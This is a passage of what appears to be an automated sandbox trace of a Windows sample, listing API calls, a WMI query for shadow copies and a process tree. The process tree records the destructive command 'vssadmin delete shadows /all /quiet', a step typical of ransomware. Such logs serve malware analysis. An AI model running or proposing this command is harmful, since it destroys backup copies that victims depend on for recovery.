(Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0134.728] free (_Block=0x19ac755ec30) [0134.728] CloseHandle (hObject=0x2b4) returned 1 [0134.728] lstrlenW (lpString="GET") returned 3 [0134.728] lstrlenW (lpString="delete") returned 6 [0134.728] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0134.728] lstrlenW (lpString="LIST") returned 4 [0134.728] lstrlenW (lpString="delete") returned 6 [0134.728] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0134.728] lstrlenW (lpString="SET") returned 3 [0134.728] lstrlenW (lpString="delete") returned 6 [0134.728] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0134.729] lstrlenW (lpString="CALL") returned 4 [0134.729] lstrlenW (lpString="delete") returned 6 [0134.729] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0134.729] lstrlenW (lpString="ASSOC") returned 5 [0134.729] lstrlenW (lpString="delete") returned 6 [0134.729] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0134.729] lstrlenW (lpString="CREATE") returned 6 [0134.729] lstrlenW (lpString="delete") returned 6 [0134.729] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0134.729] lstrlenW (lpString="DELETE") returned 6 [0134.729] lstrlenW (lpString="delete") returned 6 [0134.729] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0134.729] malloc (_Size=0x18) returned 0x19ac755df70 [0134.729] lstrlenA (lpString="") returned 0 [0134.729] malloc (_Size=0x2) returned 0x19ac7555b30 [0134.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff7140dc40c, cbMultiByte=-1, lpWideCharStr=0x19ac7555b30, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0134.729] free (_Block=0x19ac7555b30) [0134.729] malloc (_Size=0x18) returned 0x19ac755dd10 [0134.729] lstrlenA (lpString="") returned 0 [0134.729] malloc (_Size=0x2) returned 0x19ac7555b30 [0134.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff7140dc40c, cbMultiByte=-1, lpWideCharStr=0x19ac7555b30, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0134.729] free (_Block=0x19ac7555b30) [0134.729] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0134.729] malloc (_Size=0x3e) returned 0x19ac755ec30 [0134.729] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0134.729] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff60 | out: _String="Select", _Context=0xffffffffffffff60) returned="Select" [0134.729] malloc (_Size=0x18) returned 0x19ac755dc30 [0134.729] free (_Block=0x19ac755dd10) [0134.730] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x19ac7290db0*="\x01\x01" | out: _String=0x0, _Context=0x19ac7290db0*="\x01\x01") returned="*" [0134.730] lstrlenW (lpString="FROM") returned 4 [0134.730] lstrlenW (lpString="*") returned 1 [0134.730] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0134.730] malloc (_Size=0x18) returned 0x19ac755df10 [0134.730] free (_Block=0x19ac755dc30) [0134.730] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x19ac7290db0*="\x01\x01" | out: _String=0x0, _Context=0x19ac7290db0*="\x01\x01") returned="from" [0134.730] lstrlenW (lpString="FROM") returned 4 [0134.730] lstrlenW (lpString="from") returned 4 [0134.730] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0134.730] malloc (_Size=0x18) returned 0x19ac755dd30 [0134.730] free (_Block=0x19ac755df10) [0134.730] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x19ac7290db0*="\x01\x01" | out: _String=0x0, _Context=0x19ac7290db0*="\x01\x01") returned="Win32_ShadowCopy" [0134.730] malloc (_Size=0x18) returned 0x19ac755db90 [0134.730] free (_Block=0x19ac755dd30) [0134.730] free (_Block=0x19ac755ec30) [0134.730] malloc (_Size=0x18) returned 0x19ac755d9d0 [0134.730] malloc (_Size=0x18) returned 0x19ac755de70 [0134.730] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0134.730] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0134.731] free (_Block=0x19ac755df70) [0134.731] free (_Block=0x19ac755d9d0) [0134.732] ??0CHString@@QEAA@XZ () returned 0x21a13ff9e0 [0134.732] GetCurrentThreadId () returned 0x484 [0134.732] malloc (_Size=0x18) returned 0x19ac755dc70 [0134.732] malloc (_Size=0x18) returned 0x19ac755de90 [0134.732] malloc (_Size=0x18) returned 0x19ac755d970 [0134.732] malloc (_Size=0x18) returned 0x19ac755da30 [0134.732] malloc (_Size=0x18) returned 0x19ac755da70 [0134.732] SysStringLen (param_1="\\\\") returned 0x2 [0134.732] SysStringLen (param_1="NQDPDE") returned 0x6 [0134.732] malloc (_Size=0x18) returned 0x19ac755ded0 [0134.732] SysStringLen (param_1="\\\\NQDPDE") returned 0x8 [0134.732] SysStringLen (param_1="\\") returned 0x1 [0134.732] malloc (_Size=0x18) returned 0x19ac755d990 [0134.732] SysStringLen (param_1="\\\\NQDPDE\\") returned 0x9 [0134.732] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0134.733] free (_Block=0x19ac755ded0) [0134.733] free (_Block=0x19ac755da70) [0134.733] free (_Block=0x19ac755da30) [0134.733] free (_Block=0x19ac755d970) [0134.733] free (_Block=0x19ac755de90) [0134.733] free (_Block=0x19ac755dc70) [0134.733] malloc (_Size=0x18) returned 0x19ac755d890 [0134.733] malloc (_Size=0x18) returned 0x19ac755dc10 [0134.733] malloc (_Size=0x18) returned 0x19ac755dbf0 [0134.733] WbemLocator:IWbemLocator:ConnectServer (in: This=0x19ac731c900, strNetworkResource="\\\\NQDPDE\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x7ff7140f78d0 | out: ppNamespace=0x7ff7140f78d0*=0x19ac7375be0) returned 0x0 [0135.628] free (_Block=0x19ac755dbf0) [0135.628] free (_Block=0x19ac755dc10) [0135.628] free (_Block=0x19ac755d890) [0135.628] CoSetProxyBlanket (pProxy=0x19ac7375be0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0135.628] free (_Block=0x19ac755d990) [0135.628] ??1CHString@@QEAA@XZ () returned 0x7ffce127674c [0135.628] ??0CHString@@QEAA@XZ () returned 0x21a13ff920 [0135.628] GetCurrentThreadId () returned 0x484 [0135.628] malloc (_Size=0x18) returned 0x19ac755da10 [0135.628] lstrlenA (lpString="") returned 0 [0135.628] malloc (_Size=0x2) returned 0x19ac7555b30 [0135.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff7140dc40c, cbMultiByte=-1, lpWideCharStr=0x19ac7555b30, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0135.628] free (_Block=0x19ac7555b30) [0135.628] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0135.628] SysStringLen (param_1="") returned 0x0 [0135.629] free (_Block=0x19ac755da10) [0135.629] malloc (_Size=0x18) returned 0x19ac755dbf0 [0135.629] IWbemServices:ExecQuery (in: This=0x19ac7375be0, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy", lFlags=0, pCtx=0x0, ppEnum=0x21a13ff930 | out: ppEnum=0x21a13ff930*=0x0) returned 0x80041014 [0153.966] free (_Block=0x19ac755dbf0) [0153.967] _CxxThrowException () [0153.970] malloc (_Size=0x20) returned 0x19ac755ec30 [0153.970] ??1CHString@@QEAA@XZ () returned 0x7ffce127674c [0153.970] free (_Block=0x19ac755db90) [0153.970] free (_Block=0x19ac755de70) [0153.970] GetCurrentThreadId () returned 0x484 [0153.970] ??0CHString@@QEAA@PEBG@Z () returned 0x21a13ffb18 [0153.970] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x21a13ffb18 [0153.971] ??0CHString@@QEAA@XZ () returned 0x21a13ff8c0 [0153.971] malloc (_Size=0x18) returned 0x19ac755dbf0 [0153.971] malloc (_Size=0x18) returned 0x19ac755ddb0 [0153.971] SysStringLen (param_1="") returned 0x0 [0153.972] free (_Block=0x19ac755dbf0) [0153.972] CoCreateInstance (in: rclsid=0x7ff7140e05a8*(Data1=0xeb87e1bd, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ff7140e05b8*(Data1=0xeb87e1bc, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppv=0x7ff7140f78f8 | out: ppv=0x7ff7140f78f8*=0x19ac735dfd0) returned 0x0 [0153.981] WbemStatusCodeText:IWbemStatusCodeText:GetErrorCodeText (in: This=0x19ac735dfd0, hRes=0x80041014, LocaleId=0x0, lFlags=0, MessageText=0x21a13ff8b8 | out: MessageText=0x21a13ff8b8*="Initialization failure\r\n") returned 0x0 [0153.985] free (_Block=0x19ac755ddb0) [0153.985] malloc (_Size=0x18) returned 0x19ac755ddf0 [0153.985] WbemStatusCodeText:IWbemStatusCodeText:GetFacilityCodeText (in: This=0x19ac735dfd0, hRes=0x80041014, LocaleId=0x0, lFlags=0, MessageText=0x21a13ff8b0 | out: MessageText=0x21a13ff8b0*="WMI") returned 0x0 [0153.986] malloc (_Size=0x18) returned 0x19ac755d890 [0153.986] lstrlenW (lpString="WMI") returned 3 [0153.986] lstrlenW (lpString="Wbem") returned 4 [0153.986] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Wbem", cchCount1=4, lpString2="WMI", cchCount2=3) returned 1 [0153.986] lstrlenW (lpString="WMI") returned 3 [0153.986] lstrlenW (lpString="WMI") returned 3 [0153.986] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WMI", cchCount1=3, lpString2="WMI", cchCount2=3) returned 2 [0153.987] WbemStatusCodeText:IUnknown:Release (This=0x19ac735dfd0) returned 0x0 [0153.987] ??1CHString@@QEAA@XZ () returned 0x7ffce127674c [0153.987] LoadStringW (in: hInstance=0x0, uID=0xb7f3, lpBuffer=0x21a13ff120, cchBufferMax=1024 | out: lpBuffer="ERROR:\r\nDescription = %1") returned 0x18 [0153.987] FormatMessageW (in: dwFlags=0x2500, lpSource=0x21a13ff120, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x21a13ff0f0, nSize=0x0, Arguments=0x21a13ff0f8 | out: lpBuffer="쁀윱ƚ") returned 0x2e [0153.987] malloc (_Size=0x18) returned 0x19ac755d970 [0153.987] LocalFree (hMem=0x19ac731c040) returned 0x0 [0153.987] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ERROR:\r\nDescription = Initialization failure\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0153.987] malloc (_Size=0x2f) returned 0x19ac755a800 [0153.987] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ERROR:\r\nDescription = Initialization failure\r\n", cchWideChar=-1, lpMultiByteStr=0x19ac755a800, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ERROR:\r\nDescription = Initialization failure\r\n", lpUsedDefaultChar=0x0) returned 47 [0153.987] __iob_func () returned 0x7ffcea2dea00 [0153.987] fprintf (in: _File=0x7ffcea2dea60, _Format="%s" | out: _File=0x7ffcea2dea60) returned 46 [0154.427] __iob_func () returned 0x7ffcea2dea00 [0154.427] fflush (in: _File=0x7ffcea2dea60 | out: _File=0x7ffcea2dea60) returned 0 [0154.427] free (_Block=0x19ac755a800) [0154.427] free (_Block=0x19ac755d970) [0154.427] free (_Block=0x19ac755d890) [0154.427] free (_Block=0x19ac755ddf0) [0154.427] ??1CHString@@QEAA@XZ () returned 0x1 [0154.427] ??0CHString@@QEAA@PEBG@Z () returned 0x21a13ffb00 [0154.427] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x21a13ffb00 [0154.427] GetCurrentThreadId () returned 0x484 [0154.427] ??1CHString@@QEAA@XZ () returned 0x1 [0154.427] WbemLocator:IUnknown:Release (This=0x19ac7375be0) returned 0x0 [0154.428] ?Empty@CHString@@QEAAXXZ () returned 0x7ffce127674c [0154.428] free (_Block=0x19ac755ec30) [0154.428] _kbhit () returned 0x0 [0155.167] free (_Block=0x19ac755ec10) [0155.167] free (_Block=0x19ac755db70) [0155.167] free (_Block=0x19ac755dc50) [0155.167] free (_Block=0x19ac755dfd0) [0155.168] free (_Block=0x19ac755db50) [0155.168] free (_Block=0x19ac755b430) [0155.168] free (_Block=0x19ac755d930) [0155.168] free (_Block=0x19ac755aa80) [0155.168] free (_Block=0x19ac755d850) [0155.168] free (_Block=0x19ac755eb90) [0155.168] free (_Block=0x19ac755d870) [0155.168] free (_Block=0x19ac755dd90) [0155.168] free (_Block=0x19ac7555f60) [0155.168] free (_Block=0x19ac755af80) [0155.168] free (_Block=0x19ac755ebe0) [0155.168] ?Empty@CHString@@QEAAXXZ () returned 0x7ffce127674c [0155.168] free (_Block=0x19ac755e0a0) [0155.168] free (_Block=0x19ac755dd50) [0155.168] free (_Block=0x19ac755dbb0) [0155.168] free (_Block=0x19ac7555a40) [0155.168] free (_Block=0x19ac7555a90) [0155.168] free (_Block=0x19ac7555ae0) [0155.168] free (_Block=0x19ac755d950) [0155.169] free (_Block=0x19ac7555b80) [0155.169] free (_Block=0x19ac7555f40) [0155.169] free (_Block=0x19ac755a940) [0155.169] free (_Block=0x19ac7555f20) [0155.169] free (_Block=0x19ac755a500) [0155.169] free (_Block=0x19ac7555ec0) [0155.169] free (_Block=0x19ac7555ee0) [0155.169] free (_Block=0x19ac7555da0) [0155.169] free (_Block=0x19ac7555dc0) [0155.169] free (_Block=0x19ac7555d40) [0155.169] free (_Block=0x19ac7555d60) [0155.169] free (_Block=0x19ac7555e00) [0155.169] free (_Block=0x19ac7555e20) [0155.170] free (_Block=0x19ac7555e60) [0155.170] free (_Block=0x19ac7555e80) [0155.170] free (_Block=0x19ac7555c80) [0155.170] free (_Block=0x19ac7555ca0) [0155.170] free (_Block=0x19ac7555c20) [0155.170] free (_Block=0x19ac7555c40) [0155.170] free (_Block=0x19ac7555ce0) [0155.170] free (_Block=0x19ac7555d00) [0155.170] free (_Block=0x19ac7555bc0) [0155.170] free (_Block=0x19ac7555be0) [0155.170] free (_Block=0x19ac7555b50) [0155.170] free (_Block=0x19ac7551750) [0155.170] free (_Block=0x19ac755e010) [0155.170] WbemLocator:IUnknown:Release (This=0x19ac731c900) returned 0x2 [0155.170] WbemLocator:IUnknown:Release (This=0x19ac7375e20) returned 0x0 [0155.385] WbemLocator:IUnknown:Release (This=0x19ac7376450) returned 0x0 [0155.815] WbemLocator:IUnknown:Release (This=0x19ac731c900) returned 0x1 [0155.815] ?Empty@CHString@@QEAAXXZ () returned 0x7ffce127674c [0155.815] WbemLocator:IUnknown:Release (This=0x19ac731c900) returned 0x0 [0155.815] free (_Block=0x19ac755da50) [0155.816] free (_Block=0x19ac755df50) [0155.816] free (_Block=0x19ac755a740) [0155.816] free (_Block=0x19ac755dd70) [0155.816] free (_Block=0x19ac755db30) [0155.816] free (_Block=0x19ac755ab00) [0155.816] free (_Block=0x19ac755b240) [0155.816] free (_Block=0x19ac755b260) [0155.816] free (_Block=0x19ac755a5c0) [0155.816] free (_Block=0x19ac755de50) [0155.816] free (_Block=0x19ac755d9f0) [0155.816] free (_Block=0x19ac755a9c0) [0155.816] free (_Block=0x19ac755b0a0) [0155.816] free (_Block=0x19ac755b0e0) [0155.816] free (_Block=0x19ac755a680) [0155.816] free (_Block=0x19ac755b200) [0155.816] free (_Block=0x19ac755b220) [0155.816] free (_Block=0x19ac755a7c0) [0155.816] free (_Block=0x19ac755d910) [0155.816] free (_Block=0x19ac755dbd0) [0155.817] free (_Block=0x19ac755a540) [0155.817] free (_Block=0x19ac755ddd0) [0155.817] free (_Block=0x19ac755df90) [0155.817] free (_Block=0x19ac755a880) [0155.817] free (_Block=0x19ac755b080) [0155.817] free (_Block=0x19ac755b1c0) [0155.817] free (_Block=0x19ac755a8c0) [0155.817] free (_Block=0x19ac755b040) [0155.817] free (_Block=0x19ac755b060) [0155.817] free (_Block=0x19ac755aa40) [0155.817] free (_Block=0x19ac755d9b0) [0155.817] free (_Block=0x19ac755d8f0) [0155.817] free (_Block=0x19ac755a4c0) [0155.817] free (_Block=0x19ac755dfb0) [0155.817] free (_Block=0x19ac755de30) [0155.817] free (_Block=0x19ac755a700) [0155.817] free (_Block=0x19ac755b360) [0155.817] free (_Block=0x19ac755b1a0) [0155.817] free (_Block=0x19ac755a480) [0155.817] free (_Block=0x19ac755b1e0) [0155.817] free (_Block=0x19ac755b2a0) [0155.817] free (_Block=0x19ac755a400) [0155.818] free (_Block=0x19ac755b280) [0155.818] free (_Block=0x19ac755b120) [0155.818] free (_Block=0x19ac755a780) [0155.818] free (_Block=0x19ac755b2e0) [0155.818] free (_Block=0x19ac755b300) [0155.818] free (_Block=0x19ac755a440) [0155.818] free (_Block=0x19ac755b140) [0155.818] free (_Block=0x19ac755b180) [0155.818] free (_Block=0x19ac755a6c0) [0155.818] free (_Block=0x19ac755b2c0) [0155.818] free (_Block=0x19ac755b380) [0155.819] free (_Block=0x19ac755a3c0) [0155.819] free (_Block=0x19ac755b320) [0155.819] free (_Block=0x19ac755b340) [0155.819] free (_Block=0x19ac755a640) [0155.819] free (_Block=0x19ac755b3a0) [0155.819] free (_Block=0x19ac755b160) [0155.819] free (_Block=0x19ac755a980) [0155.819] free (_Block=0x19ac755b020) [0155.819] free (_Block=0x19ac755b0c0) [0155.819] free (_Block=0x19ac755aa00) [0155.820] CoUninitialize () [0159.031] exit (_Code=-2147217388) [0159.040] free (_Block=0x19ac755b3e0) [0159.040] free (_Block=0x19ac7556bb0) [0159.040] ??1CHString@@QEAA@XZ () returned 0x7ffce127674c [0159.040] free (_Block=0x19ac755b470) [0159.040] free (_Block=0x19ac7555ba0) [0159.040] free (_Block=0x19ac7556b70) [0159.040] free (_Block=0x19ac7556b30) [0159.040] free (_Block=0x19ac7551700) [0159.040] free (_Block=0x19ac75516c0) [0159.041] free (_Block=0x19ac7551660) [0159.041] free (_Block=0x19ac75515e0) [0159.041] free (_Block=0x19ac75515a0) [0159.041] ??1CHString@@QEAA@XZ () returned 0x7ffce127674c [0159.041] free (_Block=0x19ac755dcb0) Thread: id = 21 os_tid = 0x1fc Thread: id = 26 os_tid = 0xf2c Thread: id = 27 os_tid = 0x774 Thread: id = 28 os_tid = 0x7b8 Process: id = "3" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x14a42000" os_pid = "0x7e4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x11dc" cmd_line = "vssadmin delete shadows /all /quiet" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 8 os_tid = 0xcf4 Thread: id = 22 os_tid = 0x2d4 Thread: id = 23 os_tid = 0x6a4 Thread: id = 24 os_tid = 0xba0 Thread: id = 25 os_tid = 0xe88 Process: id = "4" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x14255000" os_pid = "0x980" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x380" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 9 os_tid = 0xc20 Thread: id = 11 os_tid = 0xd40 Thread: id = 13 os_tid = 0xc18 Thread: id = 18 os_tid = 0xe00 Thread: id = 20 os_tid = 0xdb4 Process: id = "5" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x6af7000" os_pid = "0xd60" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x7e4" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 10 os_tid = 0xd48 Thread: id = 12 os_tid = 0xd74 Thread: id = 14 os_tid = 0xda0 Thread: id = 17 os_tid = 0xa7c Thread: id = 19 os_tid = 0xa84 Process: id = "6" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x742fe000" os_pid = "0x3ac" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wisvc" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\WpnService" [0xa], "NT SERVICE\\wuauserv" [0xa], "S-1-5-80-603222039-1779857981-708438124-1730083285-3435298639" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00009f6a" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 29 os_tid = 0x1064 Thread: id = 30 os_tid = 0xd10 Thread: id = 31 os_tid = 0x480 Thread: id = 32 os_tid = 0x760 Thread: id = 33 os_tid = 0x13ac Thread: id = 34 os_tid = 0x1368 Thread: id = 35 os_tid = 0x1364 Thread: id = 36 os_tid = 0x1360 Thread: id = 37 os_tid = 0x135c Thread: id = 38 os_tid = 0x1358 Thread: id = 39 os_tid = 0x1354 Thread: id = 40 os_tid = 0x1318 Thread: id = 41 os_tid = 0x1314 Thread: id = 42 os_tid = 0x1310 Thread: id = 43 os_tid = 0x12fc Thread: id = 44 os_tid = 0x12b8 Thread: id = 45 os_tid = 0x12a4 Thread: id = 46 os_tid = 0x1270 Thread: id = 47 os_tid = 0x1168 Thread: id = 48 os_tid = 0x1164 Thread: id = 49 os_tid = 0x1160 Thread: id = 50 os_tid = 0x1130 Thread: id = 51 os_tid = 0x1120 Thread: id = 52 os_tid = 0x112c Thread: id = 53 os_tid = 0x1128 Thread: id = 54 os_tid = 0x10c0 Thread: id = 55 os_tid = 0x10bc Thread: id = 56 os_tid = 0x10b8 Thread: id = 57 os_tid = 0x10b0 Thread: id = 58 os_tid = 0x1094 Thread: id = 59 os_tid = 0x108c Thread: id = 60 os_tid = 0xf14 Thread: id = 61 os_tid = 0xf0c Thread: id = 62 os_tid = 0xf04 Thread: id = 63 os_tid = 0xef4 Thread: id = 64 os_tid = 0xaa0 Thread: id = 65 os_tid = 0xa30 Thread: id = 66 os_tid = 0xa14 Thread: id = 67 os_tid = 0xa0c Thread: id = 68 os_tid = 0x9e8 Thread: id = 69 os_tid = 0x9e0 Thread: id = 70 os_tid = 0x9d8 Thread: id = 71 os_tid = 0x9cc Thread: id = 72 os_tid = 0x9c4 Thread: id = 73 os_tid = 0x9b8 Thread: id = 74 os_tid = 0x9b0 Thread: id = 75 os_tid = 0x9a0 Thread: id = 76 os_tid = 0x998 Thread: id = 77 os_tid = 0x984 Thread: id = 78 os_tid = 0x978 Thread: id = 79 os_tid = 0x968 Thread: id = 80 os_tid = 0x95c Thread: id = 81 os_tid = 0x958 Thread: id = 82 os_tid = 0x944 Thread: id = 83 os_tid = 0x930 Thread: id = 84 os_tid = 0x914 Thread: id = 85 os_tid = 0x8ac Thread: id = 86 os_tid = 0x840 Thread: id = 87 os_tid = 0x83c Thread: id = 88 os_tid = 0x430 Thread: id = 89 os_tid = 0x7c0 Thread: id = 90 os_tid = 0x7bc Thread: id = 91 os_tid = 0x7ac Thread: id = 92 os_tid = 0x784 Thread: id = 93 os_tid = 0x780 Thread: id = 94 os_tid = 0x77c Thread: id = 95 os_tid = 0x6fc Thread: id = 96 os_tid = 0x678 Thread: id = 97 os_tid = 0x670 Thread: id = 98 os_tid = 0x660 Thread: id = 99 os_tid = 0x654 Thread: id = 100 os_tid = 0x61c Thread: id = 101 os_tid = 0x5d0 Thread: id = 102 os_tid = 0x5a0 Thread: id = 103 os_tid = 0x4ac Thread: id = 104 os_tid = 0x41c Thread: id = 105 os_tid = 0x414 Thread: id = 106 os_tid = 0x404 Thread: id = 107 os_tid = 0x158 Thread: id = 108 os_tid = 0x39c Thread: id = 109 os_tid = 0x2e8 Thread: id = 110 os_tid = 0x180 Thread: id = 111 os_tid = 0x234 Thread: id = 112 os_tid = 0x26c Thread: id = 113 os_tid = 0x2a0 Thread: id = 114 os_tid = 0x170 Thread: id = 115 os_tid = 0x1a8 Thread: id = 116 os_tid = 0x16c Thread: id = 117 os_tid = 0x3b0 Thread: id = 118 os_tid = 0x1024 Thread: id = 119 os_tid = 0x1038 Thread: id = 120 os_tid = 0x106c Thread: id = 138 os_tid = 0x868 Thread: id = 139 os_tid = 0x1060 Thread: id = 140 os_tid = 0x139c Thread: id = 142 os_tid = 0x1090 Thread: id = 144 os_tid = 0x13dc Thread: id = 153 os_tid = 0x1380 Thread: id = 155 os_tid = 0x119c 